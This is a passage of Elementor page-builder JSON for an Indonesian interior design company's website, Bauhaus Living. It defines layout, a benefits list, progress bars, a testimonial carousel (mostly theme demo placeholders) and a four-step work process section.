left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why Bauhaus Living ?\",\"description\":\"Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi gratis oleh team profesional\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Interior design yang mewakili keunikan setiap klien\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Design + Build Service menjadi kualitas pekerjaan \",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kepuasan Pelanggan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kualitas Hasil dan Layanan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"Apa kata mereka tentang Bauhaus?\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Prijonno Nugroho\",\"job\":\"Action Coach Jakarta\",\"testimonial\":\"Kantor kami waktu itu menggunakan jasa dari Bauhaus hasilnnya memuaskan.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/56947243_2426566684042502_6812443397089918976_n.jpg\",\"id\":4923,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"4b2f506\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\